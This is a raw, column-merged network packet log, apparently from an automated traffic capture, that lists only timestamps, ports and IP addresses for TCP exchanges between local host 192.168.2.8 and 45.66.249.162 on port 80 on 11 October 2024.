                                                                                                                                                              Oct 11, 2024 22:32:35.200489998 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.200496912 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.200509071 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.200515032 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.200531006 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.200547934 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.200556993 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.200557947 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.200581074 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.200597048 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.200613022 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.200622082 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.200644970 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.200660944 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.200716972 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.200750113 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.200802088 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.200822115 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.200831890 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.200834036 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.200851917 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.200853109 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.200865030 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.200870037 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.200882912 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.200884104 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.200897932 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.200900078 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.200907946 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.200917959 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.200932026 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.200947046 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.352066994 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.352087021 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.352135897 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.352144957 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.352150917 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.352169037 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.352178097 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.352178097 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.352188110 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.352197886 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.352197886 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.352237940 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.352420092 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.352432013 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.352447033 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.352461100 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.352474928 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.352485895 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.352499008 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.352504015 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.352525949 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.352529049 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.352536917 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.352545977 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.352557898 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.352574110 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.352575064 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.352591991 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.352597952 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.352615118 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.352622032 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.352628946 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.352646112 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.352647066 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.352659941 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.352670908 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.352679014 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.352688074 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.352699995 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.352713108 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.352715969 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.352730989 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.352739096 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.352745056 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.352755070 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.352763891 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.352771044 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.352777958 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.352787018 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.352797031 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.352802992 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.352817059 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.352821112 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.352834940 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.352835894 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.352853060 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.352859974 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.352869034 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.352871895 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.352891922 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.352895021 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.352904081 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.352914095 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.352922916 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.352930069 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.352945089 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.352946997 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.352962017 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.352963924 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.352978945 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.352981091 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.352994919 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.352998018 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.353013992 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.353015900 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.353032112 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.353035927 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.353046894 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.353048086 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.353070974 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.353085041 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.353243113 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.353300095 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.353367090 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.353378057 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.353394985 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.353404045 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.353426933 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.353440046 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.353446960 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.353446960 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.353446960 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.353456974 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.353463888 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.353476048 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.353481054 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.353496075 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.353498936 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.353518963 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.353519917 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.353533983 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.353539944 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.353554010 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.353555918 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.353569031 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.353573084 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.353583097 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.353590012 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.353605032 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.353607893 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.353620052 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.353626013 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.353636026 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.353641033 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.353657961 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.353658915 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.353672028 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.353673935 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.353692055 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.353692055 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.353703976 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.353708982 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.353724003 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.353724957 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.353737116 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.353743076 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.353758097 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.353758097 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.353775978 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.353780985 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.353791952 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.353791952 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.353811979 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.353813887 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.353828907 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.353832006 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.353846073 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.353863001 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.353991032 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.354001999 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.354024887 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.354027987 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.354038954 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.354047060 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.354058027 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.354060888 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.354077101 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.354094028 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.354301929 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.354312897 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.354331970 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.354336977 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.354348898 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.354360104 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.354367971 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.354371071 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.354383945 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.354387999 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.354399920 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.354403973 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.354420900 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.354435921 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.354485035 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.354521990 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.354547024 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.354557991 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.354578018 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.354589939 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.354615927 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.354674101 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.354685068 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.354702950 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.354716063 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.354717016 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.354733944 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.354741096 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.354764938 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.354908943 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.354984999 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.354991913 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.355004072 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.355021954 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.355036020 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.355036974 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.355056047 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.355056047 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.355074883 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.355074883 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.355088949 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.355104923 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.355211973 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.355221987 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.355240107 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.355249882 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.355252981 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.355269909 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.355278969 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.355281115 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.355300903 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.355303049 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.355328083 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.355350018 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.506484032 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.506525993 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.506542921 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.506558895 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.506584883 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.506594896 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.506608963 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.506618977 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.506633043 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.506652117 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.506664991 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.506666899 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.506690025 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.506691933 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.506691933 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.506704092 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.506721020 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.506728888 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.506742954 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.506764889 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.506771088 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.506788969 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.506799936 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.506807089 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.506817102 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.506829023 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.506836891 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.506836891 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.506849051 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.506864071 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.506871939 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.506875038 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.506886959 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.506891966 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.506911993 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.506915092 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.506920099 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.506930113 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.506946087 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.506954908 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.506963968 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.506968975 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.506982088 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.506990910 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.507005930 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.507011890 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.507015944 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.507036924 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.507036924 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.507036924 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.507051945 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.507055998 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.507071018 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.507072926 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.507091999 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.507097960 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.507107019 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.507117033 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.507124901 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.507133961 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.507141113 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.507152081 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.507164955 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.507173061 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.507184029 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.507195950 CEST4970780192.168.2.845.66.249.162
